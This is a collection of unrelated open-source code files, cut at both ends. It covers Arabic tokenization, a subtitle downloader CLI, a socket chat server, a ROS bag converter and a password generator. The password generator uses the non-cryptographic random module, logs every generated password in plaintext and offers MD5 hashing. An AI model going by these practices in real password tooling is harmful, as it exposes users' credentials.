return False
def valide_time(timestring):
try:
mat=re.match('^(2[0-3]|[01]?[0-9]):([0-5]?[0-9])$', timestring)
if mat is not None:
datetime.time(*(map(int, mat.groups()[::])))
return True
mat=re.match('^(2[0-3]|[01]?[0-9]):([0-5]?[0-9]):([0-5]?[0-9])$', timestring)
if mat is not None:
datetime.time(*(map(int, mat.groups()[::])))
return True
mat=re.match('^(2[0-3]|[01]?[0-9]):([0-5]?[0-9]):([0-5]?[0-9]).([0-9]?[0-9])$', timestring)
if mat is not None:
datetime.time(*(map(int, mat.groups()[::])))
return True
except ValueError:
pass
return False
def valid_email(emailstring):
try:
mat=re.match('^[^@]+@[^@]+\.[^@]+$',emailstring)
if mat is not None:
return True
except ValueError:
pass
return False
def removeDiacritics(instring):
return re.sub(r'[ـًٌٍَُِّْ]', '', instring)
def tokenizeline(txtstring):
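    # Tokenize one line of Arabic text: strip diacritics, split on Arabic delimiters, keep
    # hashtags, mentions, URLs, emails, dates, times and numbers as single tokens, and run
    # everything else through NLTK's word_tokenize.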
elements =[]
#Remove Kashida and diacritics.
txtstring = removeDiacritics(txtstring)
#Split on Arabic delimiters
for aword in re.split(r'،|٫|٫|٬|؛',txtstring):
for word in aword.split():
#print("==>",word)
if (word.startswith("#")
or word.startswith("@")
or word.startswith(":")
or word.startswith(";")
or word.startswith("http://")
or word.startswith("https://")
or valid_email(word)
or valid_date(word)
or valid_number(word)
or valide_time(word)):
elements.append(word)
else:
for elt in word_tokenize(word):
elements.append(elt)
output = ''
for elt in elements:
output = output + ' ' + elt
return output
```
#### File: dialects_segmenter_model/preprocessing/preprocessing.py
```python
import pandas as pd
import sys
import codecs
import os
HERE = os.getcwd() + '/'
data_path = os.path.join(HERE, 'data/SampleData.xlsx')
out_tweets_path = os.path.join(HERE, 'data/tweets.txt')
out_lookup_path = os.path.join(HERE, 'data/lookup_list.txt')
out_conll_path = os.path.join(HERE, 'data/joint.trian.3')
def create_dict_data(xls):
sheet_names = ['Ahmed', 'Omar', 'Sara', 'Ghassan']
seg_correct_dict = {}
for sheet_name in sheet_names:
df = pd.read_excel(xls, sheet_name)
df.name = sheet_name
Freq = df['Freq']
Word = df['Word']
Segments = df['Segments']
Corrections = df['Corrections']
for correct, seg in zip(Corrections, Segments):
correct = str(correct).strip()
seg = str(seg).strip()
if correct != "nan":
if seg not in seg_correct_dict:
seg_correct_dict[seg] = correct
return seg_correct_dict
def create_correct_tweets(xls, correct_dict):
tweets = []
Data_df = pd.read_excel(xls, 'Data')
for twet in Data_df['Tweet']:
text = str(twet).strip().split(' ')
t = ''
for word in text:
if word in correct_dict:
word = correct_dict[word]
t += word + ' '
tweets.append(t.strip())
return tweets
def convertTrainingData(infile, outfile, append=False):
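    # Convert '+'-segmented words into CoNLL-style character/label lines using a B/M/E/S
    # scheme, writing 'WB\tWB' between words and a blank line at each <EOTWEET> marker.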
fp = codecs.open(infile, 'r','utf-8')
if append:
output_file = open(outfile, "a")
else:
output_file= open(outfile, "w+")
for line in fp:
line = line.strip()
#print('In:',line)
if('<EOTWEET>' in line): #EOS
output_file.write(''+'\n')
#print('')
continue
for word in line.split():
for elt in word.split('+'):
if(len(elt)==1):
output_file.write(elt+'\t'+'S'+'\n')
#print(elt+'\t'+'S')
elif(len(elt)>=2):
output_file.write(elt[0]+'\t'+'B'+'\n')
#print(elt[0]+'\t'+'B')
for i in range(1, len(elt)-1):
output_file.write(elt[i]+'\tM'+'\n')
#print(elt[i]+'\tM')
output_file.write(elt[-1]+'\t'+'E'+'\n')
#print(elt[-1]+'\t'+'E')
output_file.write('WB\tWB'+'\n')
#print('WB\tWB')
fp.close()
output_file.close()
if __name__ == '__main__':
write_lookup = True
data_2_conll = True
append = True
xls = pd.ExcelFile(data_path)
seg_correct_dict = create_dict_data(xls)
corrected_tweets = create_correct_tweets(xls, seg_correct_dict)
# Write corrected tweets to new file
f= open(out_tweets_path,"w+")
for tweet in corrected_tweets:
f.write(tweet + '\n')
f.close()
# Write lookup list to new file
if write_lookup:
lookup_list = set(seg_correct_dict.values())
if append:
f= open(out_lookup_path, "a")
else:
f= open(out_lookup_path, "w+")
for word in lookup_list:
f.write(word + '\n')
f.close()
# Write converted conll data to new file
if data_2_conll:
convertTrainingData(out_tweets_path, out_conll_path, append=True)
```
#### File: Arabic-dialects-segmenter-with-flask/tests/test.py
```python
from FarasaPy3.api import FarasaPy3
class FarasaTest():
def __init__(self):
self.text = "بلادي وان جارت على عزيزة واهلي وان ضنوا على كرام"
self.farasaApi = FarasaPy3()
def test_segmentation(self):
assert self.farasaApi.Segmentation(self.text) == "بلاد+ي وان جار+ت على عزيز+ة و+اهلي وان ضن+وا على كرام", "incorrect Segmentation"
def test_lemmatization(self):
assert self.farasaApi.Lemmatization(self.text) == "بلد وان جارى على عزيز اهلي وان ضن على رام", "incorrect Lemmatization"
def test_pos(self):
assert self.farasaApi.POS(self.text) == "S NOUN PRON NOUN NOUN+NSUFF PREP NOUN+NSUFF CONJ NOUN NOUN V+PRON PREP NOUN E", "incorrect POS"
def test_spellcheck(self):
assert self.farasaApi.SpellCheck(self.text) == "بلادي وإن/وان جارت على عزيزة وأهلي/واهلي وإن/وان ضنوا على كرام", "incorrect Spellcheck"
def test_diacritization(self):
assert self.farasaApi.Diacritization(self.text) == "بِلادي وانْ جارَتْ عَلَى عَزيزَةٍ واهَّلي وانْ ضَنّوا عَلَى كِرامِ", "incorrect Diacritization"
def test_diacritizationV2(self):
assert self.farasaApi.DiacritizationV2(self.text) == "بِلَادِي وَانْ جَارَتْ عَلَى عَزيزَةٍ واهَّلي وَانْ ضَنّوا عَلَى كِرامٍ", "incorrect DiacritizationV2"
def test_dialectdiacritization(self):
assert self.farasaApi.DialectDiacritization(self.text, "mor") == "بْلَادِي وَانْ جَارْتْ عْلَى عْزِيزَة وَاهْلِي وَانْ ضْنُّو عْلَى كَرَامْ", "incorrect DialectDiacritization"
def test_dialectarsegmentation(self):
assert self.farasaApi.DialectARSegmentation(self.text) == "بلاد+ي و+ان جار+ت على عزيز+ة و+اهل+ي و+ان ضن+وا على كرام", "incorrect DialectARSegmentation"
``` |
{
"source": "7AM7/package-example",
"score": 2
} |
#### File: package-example/package_am7/simple_sum.py
```python
import numpy
def simple_sum(x, y):
return x + y
``` |
{
"source": "7aman/ezsub",
"score": 2
} |
#### File: cli/commands/download.py
```python
from pathlib import Path
from ezsub import const
from ezsub.cache import Cache
from ezsub.mirrors import Mirror
from ezsub.destination import Destination
from ezsub.utils import to_screen, select, parse_lngs
from ezsub.errors import NoResultError, NothingToDownloadError, NetworkError
cur = const.Curser
def download(req):
site = Mirror(req.site)
site.select_first_responding()
cache = Cache()
destination = Destination(req.destination, req.group, req.open_after)
if req.exact:
results, selected = site.exact_search(req.exact)
else: # use title
results = site.search(req.title)
selected = select(results, req.auto_select)
if not selected:
raise NoResultError
paths = [results[s-1]['path'] for s in selected]
lngs = parse_lngs(req.lngs)
new_subs = prune(paths, lngs, site, cache)
if not new_subs:
raise NothingToDownloadError
if req.simulation:
n = len(new_subs)
for i, path in enumerate(new_subs):
file = cache.get_child(f'{path}.zip', mk_parents=True)
to_screen(f"\rcreating empty zip files... {i+1}/{n}", end='') # progress stats
cache.empty_zipfile(file)
else:
to_screen("\rcreating empty zip files... ", end='')
to_screen(f"{cur.CFH}done", style='ok')
else:
try:
to_download = site.mass_request(new_subs)
except Exception as error:
raise error
for index, item in enumerate(to_download):
to_download[index]['path'] = cache.get_child(f"{item['path']}.zip", mk_parents=True)
to_extract = site.mass_download(to_download)
destination.extract(to_extract)
return None
def prune(paths, lngs, site, cache):
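# For each result page keep only subtitle links in the requested languages and drop links
# already present in the cache, printing per-language counts for the "all" and "new" sets.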
pruned = []
for path in paths:
to_screen("\n url: ", end='')
to_screen(f"{site.base_url}{path}", style="info")
links = site.get_subs(path)
results = [
link
for link in links
if link.split('/')[-2] in lngs.values() # filter language
]
splitted = count_each_language(results, lngs)
to_screen(" all: ", end='')
to_screen(splitted, style="ok")
new_subs = [
path
for path in results
if not cache.exists(f'.{path}.zip') # filter already downloaded
]
splitted = count_each_language(new_subs, lngs)
to_screen(" new: ", end='')
to_screen(splitted, style="ok")
pruned = pruned[:] + new_subs[:]
splitted = count_each_language(pruned, lngs)
to_screen("\ntotal: ", end='')
to_screen(splitted, style="ok")
return pruned
def count_each_language(results, lngs):
splitted = {lng: 0 for lng in lngs.keys()}
mapper = {language: lng for lng, language in lngs.items()}
for link in results:
language = link.split('/')[-2]
splitted[mapper[language]] += 1
# remove empty languages
splitted = {key: value for key, value in splitted.items() if value}
return splitted
```
#### File: cli/commands/info.py
```python
import os
from ezsub import const
from ezsub.cache import Cache
from ezsub.errors import CacheIsEmptyError
from ezsub.utils import to_screen, get_size, get_title, machine_readable, count_children
def info(req):
cache = Cache()
path = cache.subtitles
if not os.listdir(path):
raise CacheIsEmptyError
else:
size = get_size(path, 'human')
children = count_children(path, 0, generation=1)
total = count_children(path, 0, generation=3)
basic_info(path, size, children, total)
to_screen()
if req.verbosity >= 1:
level_one(path, req.sort)
to_screen()
return None
LANGMAX = 15
SIZEMAX = 10
COUNTMAX = 6
SPACING = 3
BAR = 41
SYMBOL = '#'
def basic_info(path, size, children, total):
TAB = 2
to_screen(f"\nezsub ver {const.__version__}")
to_screen('\n[basic info]')
to_screen(f'{" "*TAB}Path : {path}')
to_screen(f'{" "*TAB}Size : {size}')
to_screen(f'{" "*TAB}Titles : {children}')
to_screen(f'{" "*TAB}Subtitles: {total}')
return None
def level_one(path, sort_key):
items = get_sorted_items(path, sort_key)
tick = {'s': '', 'n': '', 't': ''}
tick[sort_key] = SYMBOL
headers = [
f'{tick["n"]}Files'.rjust(COUNTMAX),
f'{tick["s"]}Size'.rjust(SIZEMAX),
f'{tick["t"]}Title'
]
header = (' '*SPACING).join(headers)
subheaders = ["="*COUNTMAX, "="*SIZEMAX, "="*BAR]
subheader = (" "*SPACING).join(subheaders)
to_screen(header)
to_screen(subheader)
for item in items:
row_items = [
str(item['n']).rjust(COUNTMAX),
item['s'].rjust(SIZEMAX),
item['t']
]
to_screen((' '*SPACING).join(row_items))
to_screen(subheader)
to_screen(header)
to_screen(f'\nresults are sorted by {SYMBOL} marked column.\n', style="warn")
return None
def get_sorted_items(path, sort_key):
items = list()
for child in path.iterdir():
items.append({
't': get_title(child),
's': get_size(child, 'human'),
'n': count_children(child, 0, generation=2)
})
def key(x):
if sort_key == 's':
return machine_readable(x[sort_key])
else:
return x[sort_key]
reverse = False if sort_key == 't' else True
return sorted(items, key=key, reverse=reverse)
```
#### File: ezsub/cli/__init__.py
```python
import sys
import logging
import argparse
from ezsub import const
from ezsub.utils import to_screen
from ezsub.cli.commands import (
download, config, update, login, backup, history, info, clean, unzip
)
from ezsub.errors import (
JobDone,
WrongLineNumberError,
NothingToCleanError,
NothingToDownloadError,
NothingToExtractError,
NoResultError,
CacheIsEmptyError,
NoSiteIsAvailableError,
GetContentFailed,
ForciblyClosedError,
NetworkError
)
def get_user_loglevel():
parser = argparse.ArgumentParser(add_help=False)
parser.add_argument("--loglevel")
args, _ = parser.parse_known_args(sys.argv[1:])
loglevel = args.loglevel
if loglevel:
numeric_level = getattr(logging, loglevel.upper(), None)
if isinstance(numeric_level, int):
to_screen(f"loglevel is set to {loglevel.upper()}", style="ok")
return loglevel.upper()
else:
to_screen(f"Invalid log level {loglevel}. Ignored.", style="warn")
return ''
logging.basicConfig(
filename=const.LOGFILE,
filemode=const.LOGFILEMODE,
level=get_user_loglevel() or const.LOGLEVEL,
format=const.LOGFORMAT
)
logger = logging.getLogger()
def main():
try:
req = history(sys.argv[1:])
if req.command not in ['update', 'u']:
update(just_remind=True)
if req.command in ['dl', 'd', 'download']:
download(req)
elif req.command in ['unzip', 'x']:
unzip(req)
elif req.command in ['config', 'cfg']:
config(req)
elif req.command in ['update', 'u']:
update()
elif req.command in ['login', 'l']:
login()
elif req.command in ['backup', 'b']:
backup(req)
elif req.command in ['info', 'i']:
info(req)
elif req.command in ['clean']:
clean(req)
except KeyboardInterrupt:
to_screen("\nTerminated by user.", style="red;bold")
except NothingToCleanError:
to_screen("\nNothing to clean.", style="warn;bold")
except NothingToExtractError:
to_screen("\nNothing to extract.", style="warn;bold")
except NothingToDownloadError:
to_screen("\nNothing to download.", style="warn;bold")
except NoResultError:
to_screen("\nNo Result for this title.", style="warn;bold")
except CacheIsEmptyError:
to_screen("\nCache folder is empty.", style="warn;bold")
except NoSiteIsAvailableError:
to_screen("\nSites are not accessible. check internet connection.", style="red;bold")
except GetContentFailed:
to_screen("\nGetting page content is failed. try later.", style="red")
except ForciblyClosedError:
to_screen("\nServer closed connections forcibly :(", style="red")
except NetworkError:
to_screen("\nNetwork error. See log for more details.", style="red")
except JobDone:
pass
except WrongLineNumberError:
to_screen("\nWrong line number", style="warn;bold")
to_screen('\a')
sys.exit(0)
if __name__ == "__main__":
main()
``` |
{
"source": "7amoodtarek/strong-password-generator",
"score": 3
} |
#### File: 7amoodtarek/strong-password-generator/main.py
```python
import logging as log
import random
from string import *
import hashlib
import binascii
import os
import colorama as cl
# Log file configuration
log.basicConfig(
level=log.INFO,
format="%(asctime)s -> %(message)s",
filename="generatedPasswords.log"
)
# Colorama configuration
cl.init(autoreset=True)
error = cl.Fore.RED
success = cl.Fore.GREEN
message = cl.Fore.LIGHTWHITE_EX
menu_heading = cl.Fore.YELLOW
choices = cl.Fore.BLUE
warn = cl.Fore.LIGHTYELLOW_EX
# Errors
class LengthError(Exception):
pass
class EmptyCrap(Exception):
pass
def main():
def exiting_app():
# Holds the screen in case program ran as exe or other
import time
print(f"\n{success}Exiting...")
time.sleep(1)
exit()
# Password generating
def pass_gen_all(max_range_all):
# Initializing - removing unwanted characters from the variable
chars = list(printable) # Imported from string - Has all the possible printable characters in the ASCII
chars.pop(85)
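# printable[85] is the backslash; the loop below also drops the six trailing whitespace characters.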
for p in range(6):
chars.pop()
password = ""
max_range_all = int(max_range_all)
if max_range_all == 0:
exiting_app()
else:
for i in range(max_range_all):
password += random.choice(chars)
print(f"{message}Generated password: {success}{password}")
log.info(f"Password: {password}\n")
def pass_gen_nocapitals(max_range_nocapitals):
temp = ascii_lowercase + digits + punctuation # Imported from string.
chars = list(temp)
chars.pop(59)
password = ""
max_range_nocapitals = int(max_range_nocapitals)
if max_range_nocapitals == 0:
exiting_app()
exit()
else:
for i in range(max_range_nocapitals):
password += random.choice(chars)
print(f"{message}Generated password: {success}{password}")
log.info(f"Password: {password}\n")
def pass_gen_nosymbols(max_range_nosymbols):
chars = list(printable)
chars.pop(85)
for s in range(37):
chars.pop()
password = ""
max_range_nosymbols = int(max_range_nosymbols)
if max_range_nosymbols == 0:
exiting_app()
else:
for i in range(max_range_nosymbols):
password += random.choice(chars)
print(f"{message}Generated password: {success}{password}")
log.info(f"Password: {password}\n")
def int_length_checker(int_length):
if int(int_length) < 9 or int(int_length) > 42: # Editable
raise LengthError(f"{error}Please enter a range between 9 and 42. Mostly passwords below or above that range are not usable.")
def file_checker(filename):
if os.stat(filename).st_size == 0:
raise EmptyCrap
def app_starter():
print(f"""{message}
Random password generator by <NAME>.
Enter 0 to exit the program.
""")
def main_menu():
print(f"""{menu_heading}
Please select any of the below choices:
{choices}
1. Generate a random password
2. View all the generated passwords
3. Hash a password
4. View all the ASCII characters
5. Contact developer
6. Help
""")
def pass_options():
print(f"""{menu_heading}
Select one of the below options:
{choices}
1. Include everything (Recommended)
2. Don't include symbols
3. Don't include Uppercase letters
""")
def hash_options():
print(f"""{menu_heading}
Please choose one of the below hashing type:
{choices}
1. SHA256 (Recommended)
2. MD5
""")
# Extras & Details
def hash_details(salt_used, iteration_num):
print(f"""{message}
Details {"-" * 100}
{message}-> Salt used: {success}{salt_used}
{message}-> Number of iterations: {success}{iteration_num}
""")
# Starting of program
app_starter()
while True: # Infinite loop - program won't stop unless an argument of 0
try:
main_menu()
choice_num = int(input("> "))
if choice_num == 0:
exiting_app()
if choice_num == 1:
try:
print(f"{menu_heading}Enter a range: ")
max_range = int(input("> "))
if max_range == 0:
exiting_app()
int_length_checker(max_range)
while True:
try:
pass_options()
password_opt = int(input("> "))
if password_opt == 0:
exiting_app()
if password_opt == 1:
pass_gen_all(max_range)
break
elif password_opt == 2:
pass_gen_nosymbols(max_range)
break
elif password_opt == 3:
pass_gen_nocapitals(max_range)
break
else:
print(f"{error}Option {password_opt} is not in the list.")
except ValueError:
print(f"{error}We cannot process this with any non-integer argument. please enter a valid choice")
# EOFError and KeyboardInterrupt are errors that might occur when the user uses exiting shortcuts
except EOFError:
exiting_app()
except KeyboardInterrupt:
pass
except LengthError as e: # Line 35
print(e)
except ValueError:
print(f"{error}We cannot process this with any non-integer argument. please enter a valid range")
except EOFError:
exiting_app()
exit()
except KeyboardInterrupt:
pass
# Will return to main menu after procedure
elif choice_num == 2:
with open("generatedPasswords.log", "r") as f:
if os.stat("generatedPasswords.log").st_size == 0:
print(f"{error}You haven't generated any password yet!")
else:
print(f.read())
elif choice_num == 3:
try:
with open("salts.txt", "r") as f:
file = f.readlines()
if os.stat("salts.txt").st_size == 0:
print(f"{warn}Warning: salts.txt is empty. Your password can still be hashed but it's always a good idea to add salt to it")
else:
salt = random.choice(file)
hash_options()
hash_type = int(input("> "))
print(f"{menu_heading}Enter your password: ")
user_pass = input("> ")
iterations = random.randint(5000, 10000)
if hash_type == 0:
exiting_app()
if hash_type == 1:
try:
file_checker("salts.txt")
type_sha = hashlib.pbkdf2_hmac("sha256", user_pass.encode("utf-8"), salt.encode("utf-8"), iterations)
final_sha = str(binascii.hexlify(type_sha))
print(f"{message}Your hashed password: {success}{(final_sha[2 :]).rstrip(final_sha[-1])}")
hash_details(salt_used=salt, iteration_num=iterations)
except EmptyCrap:
type_sha = hashlib.sha256(user_pass.encode("utf-8"))
print(f"{message}Your hashed password: {success}{type_sha.hexdigest()}\n")
print(f"{warn}Warning: This is the original hash of your password and can be decrypted easily without a salt")
elif hash_type == 2:
try:
file_checker("salts.txt")
type_md5 = hashlib.pbkdf2_hmac("md5", user_pass.encode("utf-8"), salt.encode("utf-8"), iterations)
final_md5 = str(binascii.hexlify(type_md5))
print(f"{message}Your hashed password: {success}{(final_md5[2 :]).rstrip(final_md5[-1])}")
hash_details(salt_used=salt, iteration_num=iterations)
except EmptyCrap:
type_md5 = hashlib.md5(user_pass.encode("utf-8"))
print(f"{message}Your hashed password: {success}{type_md5.hexdigest()}\n")
print(f"{warn}Warning: This is the original hash of your password and can be decrypted easily without a salt")
else:
print(f"{error}Wait a sec.. For goodness sake dude, please choose from the list!")
except FileNotFoundError:
print(f"{error}Oops! It looks like salts.txt is deleted or either you didn't install it properly lol. Please reinstall this repository and try again")
except ValueError:
print(f"{error}The choice list is displayed with numbers nothing else. Please choose a valid choice.")
except EOFError:
exiting_app()
except KeyboardInterrupt:
pass
elif choice_num == 4:
print(f"{success}{printable}")
elif choice_num == 5:
with open("README.md", "r") as f:
print(f.read())
else:
print(
f"{error}You don't see an option {choice_num} there don't you? please select the choices that are available.")
except ValueError:
print(
f"{error}The choice list is displayed with numbers nothing else. Please choose depends on the choice list.")
except EOFError:
exiting_app()
except KeyboardInterrupt:
exiting_app()
if __name__ == "__main__":
main()
# End of the script.
``` |
{
"source": "7amoodtarek/wifi-password-finder",
"score": 3
} |
#### File: 7amoodtarek/wifi-password-finder/run.py
```python
import os
from sys import platform
def main():
try:
# Since the os.system commands for each operating system is different.
if platform == 'win32':
os.system("python3 win.py")
elif platform == 'darwin':
os.system("python3 mac.py")
elif platform == 'linux':
os.system("python3 linux.py")
# This will probably happen if the client is running on a platform other than Windows, macOS or Linux.
else:
with open("README.md", 'r') as f:
print(f.read())
from time import sleep
print("exiting after 20 seconds")
sleep(20)
except (KeyboardInterrupt, EOFError):
exit("\nEXITED")
if __name__ == '__main__':
main()
``` |
{
"source": "7andahalf/PyChat-GUI",
"score": 3
} |
#### File: PyChat-GUI/gui_server/server.py
```python
import curses
import socket
import threading
import time
import sys
import subprocess
import ctypes
from Tkinter import *
import tkMessageBox,Tkinter
import util
DATA_BUFFER= lambda x:x
f = open("chat history.txt","a")
i=0
# THREADED CLASS FOR RECEIVING
class server_receive(threading.Thread):
def __init__(self,conn,client_name, m):
threading.Thread.__init__(self)
self.conn = conn
self.stop=False
self.m = m
server_receive.client_name = client_name
def message_receive(self):
data = self.conn.recv(DATA_BUFFER(1024))
self.conn.send('OK')
return self.conn.recv(DATA_BUFFER(1024))
raise IOError
def run(self):
while not self.stop:
global i
try:
message = self.message_receive()
except IOError:
print "Client has closed PyChat window ! Press ctrl +c to exit"
f.close()
sys.exit()
frame = self.m.mframe
subFrame = Frame(frame, height = 20, width = 460)
subFrame.grid(row=i,column=0)
Label(subFrame,text=server_receive.client_name+" : "+str(message)).place(x=5,y=0)
i+=1
# CONNECTS THE SOCKETS TO THE CORRESPONDING SEND AND RECEIVE CONNECTIONS
def SetConnection(conn1,conn2):
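# Pair the two accepted sockets: the one announcing 'WILL RECV' becomes the server's
# send channel, the other one its receive channel.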
connect={}
state = conn1.recv(9)
conn2.recv(9)
if state =='WILL RECV':
connect['send'] = conn1 # server will send data to receiver
connect['recv'] = conn2
else:
connect['recv'] = conn1 # server will receive data from sender
connect['send'] = conn2
return connect
# FUNCTION WHICH HELPS IN SENDING THE MESSAGE
def message_send(conn,server_name,msg,slf):
global i
frame = slf.mframe
subFrame = Frame(frame, height = 20, width = 460)
subFrame.grid(row=i,column=0)
Label(subFrame,text=server_name+" : "+str(msg)).place(x=5,y=0)
i+=1
if len(msg)<=999 and len(msg)>0:
conn.send(str(len(msg)))
if conn.recv(2) == 'OK':
conn.send(msg)
else:
conn.send(str(999))
if conn.recv(2) == 'OK':
conn.send(msg[:999])
message_send(conn,msg[1000:]) # calling recursive
# INITIAL SPLASH SCREEN
def server_initialize():
# Init
l = []
class loading(util.window):
def __init__(self):
# Init
util.window.__init__(self,"PyChat | Welcome",width = 500, height=600)
# image
canvas = Canvas(width = 500, height = 600, bg = 'white')
canvas.pack(expand = YES, fill = BOTH)
gif1 = PhotoImage(file = './data/1.gif')
canvas.create_image(0, 0, image = gif1, anchor = NW)
# Login frame
login_frame = Frame(self.root, height = 180, width = 400, relief = FLAT, bd = 1)
login_frame.place(x=40,y=350)
x,y = 70,20
Label(login_frame, text="Please enter your details to start chatting").place(x=x, y = y+0)
Label(login_frame, text="Host : ").place(x=x+0, y = y+30)
Label(login_frame, text="Port : ").place(x=x+0, y = y+60)
Label(login_frame, text="Name : ").place(x=x+0, y = y+90)
entry_host = Entry(login_frame)
entry_port = Entry(login_frame)
entry_name = Entry(login_frame)
entry_host.place(x=x+80, y = y+30)
entry_port.place(x=x+80, y = y+60)
entry_name.place(x=x+80, y = y+90)
Button(login_frame, text ="Start Chat", command=(lambda: self.start(entry_host.get(),entry_port.get(),entry_name.get()))).place(x=x+80, y = y+120)
# run
self.root.mainloop()
def start(self, host, port, name):
self.root.destroy()
l.append(host)
l.append(int(port))
l.append(name)
loading()
return l
def main():
HOST, PORT, server_name = server_initialize()
class mainw(util.window):
def __init__(self):
self.con = None
self.sname = None
# Init
util.window.__init__(self,"PyChat",width = 500, height=600)
main_frame = Frame(self.root, height = 500, width = 500, relief = RAISED, bd = 0)
main_frame.place(x=10,y=20)
def myfunction(event):
canvas.configure(scrollregion=canvas.bbox("all"),width=457,height=500)
canvas=Canvas(main_frame)
frame=Frame(canvas)
myscrollbar=Scrollbar(main_frame,orient="vertical",command=canvas.yview)
canvas.configure(yscrollcommand=myscrollbar.set)
myscrollbar.pack(side="right",fill="y")
canvas.pack(side="left")
canvas.create_window((0,0),window=frame,anchor='nw')
frame.bind("<Configure>",myfunction)
self.mframe = frame
x,y = 20,550
entry_msg = Entry(self.root, width=43)
entry_msg.place(x=x, y = y)
Button(self.root, text ="Send", command=(lambda: self.sendd(entry_msg.get()))).place(x=x+400, y = y)
def sendd(self, msg):
message_send(self.con,self.sname,msg,self)
m = mainw()
# SOCKET OBJECT INITIALIZATION
socket_object = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
socket_object.bind((HOST, PORT))
socket_object.listen(1)
# WAITING FOR CONNECTION ...
(conn1,addr1) = socket_object.accept()
(conn2,addr2) = socket_object.accept()
# CONNECTION ESTABLISHED !
#INITIALIZING SEND AND RECEIVE
connect = SetConnection(conn1,conn2)
# INITIALIZING SERVER AND CLIENT NAMES
conn2.send(server_name)
client_name = conn1.recv(DATA_BUFFER(1024))
receive = server_receive(connect['recv'],client_name,m)
receive.start()
m.con = connect['send']
m.sname = server_name
m.root.mainloop()
if __name__ == '__main__':
main()
``` |
{
"source": "7aske/instapy-bot",
"score": 2
} |
#### File: bot/utils/__init__.py
```python
from os.path import isabs
from random import choice, randrange
from PIL import Image
def get_timeout(timeout):
offset = choice([-1, 1]) * randrange(int(timeout / 20), int(timeout / 10) + 1)
return timeout + offset
def is_bnw(path):
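# Sample every 4th pixel and report the image as black-and-white when fewer than 20%
# of the sampled pixels have differing colour channels.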
img = Image.open(path)
w, h = img.size
pix = {"B": 0, "C": 0, "T": 0}
for i in range(int(w / 4)):
for j in range(int(h / 4)):
r, g, b = img.getpixel((i * 4, j * 4))
if r != g != b:
pix["C"] += 1
else:
pix["B"] += 1
pix["T"] += 1
try:
out = pix["C"] / pix["T"]
return out < 0.2
except ZeroDivisionError:
out = 0
return out < 0.2
finally:
img.close()
def validate_mail(config):
if "mailer" in config:
if "to" in config["mailer"] and "username" in config["mailer"] and "password" in \
config["mailer"]:
return True
return False
class PhotoStack:
def __init__(self):
self.photos = []
def __repr__(self):
return str([str(photo) for photo in self.photos])
def __len__(self):
return len(self.photos)
def push(self, item):
from instapy_bot.bot.utils.photo import Photo
if isinstance(item, Photo):
self.photos.append(item)
elif isabs(item):
self.photos.append(Photo(item))
def pop(self):
return self.photos.pop()
def is_empty(self):
return self.photos == []
class WrongPassword(Exception):
def __init__(self, *args: object) -> None:
super().__init__(*args)
print("Wrong password")
class ServerError(Exception):
def __init__(self, *args: object) -> None:
super().__init__(*args)
print("Server Error")
``` |
{
"source": "7atp/TCP-Chat",
"score": 3
} |
#### File: 7atp/TCP-Chat/final_server.py
```python
from socket import AF_INET, socket, SOCK_STREAM, SOCK_DGRAM, IPPROTO_UDP, SOL_SOCKET, SO_BROADCAST
from threading import Thread
def send_udp_invitation():
"""Sets up handling for incoming clients."""
Thread(target=accept_incoming_connections).start()
# Thread(target=tempfunc).start()
while True:
message = b"Send me ur free tcp port"
udp_server_socket.sendto(message, ('<broadcast>', 37020))
#print("invitation sent!")
# def tempfunc():
# while True:
# client, client_address = SERVER.accept()
# Thread(target=handle_client, args=(client,)).start()
def accept_incoming_connections():
"""Sets up handling for incoming clients."""
while True:
port, client_address = udp_listen.recvfrom(BUFSIZ)
if(port in addresses):
continue # duplicate
newport = int(port.decode("utf8"))
newaddr = ("localhost", newport)
print("%s:%d has connected." % newaddr)
addresses[port] = newaddr
client_socket2 = socket(AF_INET, SOCK_STREAM)
client_socket2.connect(newaddr)
clients[client_socket2] = newport
client_socket2.send(bytes(str(my_port), "utf8"))
client_socket2.send(bytes("Hi! Type your name and press enter", "utf8"))
# ------------
client, client_address2 = SERVER.accept()
Thread(target=handle_client, args=(client,)).start()
def handle_client(client):
name = client.recv(BUFSIZ).decode("utf8")
# welcome = 'Welcome %s! If you ever want to quit, type {quit} to exit.' % name
# client.send(bytes("{quit}", "utf8"))
msg = "%s has joined the chat!" % name
broadcast(bytes(msg, "utf8"))
while True:
msg = client.recv(BUFSIZ)
if msg != bytes("{quit}", "utf8"):
broadcast(msg, name+": ")
else:
client.send(bytes("{quit}", "utf8"))
client.close()
broadcast(bytes("%s has left the chat." % name, "utf8"))
break
def broadcast(msg, prefix=""): # prefix is for name identification.
"""Broadcasts a message to all the clients."""
for sock in clients:
sock.send(bytes(prefix, "utf8")+msg)
clients = {}
addresses = {}
# tcp
BUFSIZ = 1024
ADDR = ('', 33000)
my_port = 2100
SERVER = socket(AF_INET, SOCK_STREAM)
SERVER.bind(("localhost", my_port))
SERVER.listen(20)
if __name__ == "__main__":
udp_listen = socket(AF_INET, SOCK_DGRAM)
udp_listen.bind(('', 34000))
udp_server_socket = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)
udp_server_socket.setsockopt(SOL_SOCKET, SO_BROADCAST, 1)
udp_server_socket.settimeout(2)
udp_server_socket.bind(("", 33000))
print("Sending udp invitation & Waiting for tcp connection...")
ACCEPT_THREAD = Thread(target=send_udp_invitation)
ACCEPT_THREAD.start()
ACCEPT_THREAD.join()
SERVER.close()
``` |
{
"source": "7ayushgupta/Anahita",
"score": 3
} |
#### File: Anahita/utils/bag_to_video.py
```python
import roslib
roslib.load_manifest('rosbag')
import rosbag
import sys, getopt
import os
from sensor_msgs.msg import CompressedImage
from sensor_msgs.msg import Image
from cv_bridge import CvBridge, CvBridgeError
import cv2
import numpy as np
import shlex, subprocess
opt_fps =25.0
opt_rate = 1
opt_out_file=""
opt_fourcc = "XVID"
opt_topic = ""
opt_files = []
opt_display_images = False;
def print_help():
print
print 'rosbag2video.py [--fps 25] [--rate 1] [-o outputfile] [-s (show video)] [-t topic] bagfile1 [bagfile2] ...'
print
print 'converts image sequence(s) in ros bag file(s) to video file(s) with fixed frame rate using avconv'
print 'avconv needs to be installed! (sudo apt-get install libav-tools)'
print 'if no output file (-o) is given the filename \'<topic>.mp4\' is used and default output codec is h264'
print 'multiple image topics are supported only when -o option is _not_ used'
print 'avconv will guess the format according to given extension'
print 'compressed and raw image messages are supported with mono8 and bgr8/rgb8'
print 'Maximilian Laiacker 2016'
if len(sys.argv) < 2:
print 'Please specify ros bag file(s)'
print 'For example:'
print_help()
exit(1)
else :
try:
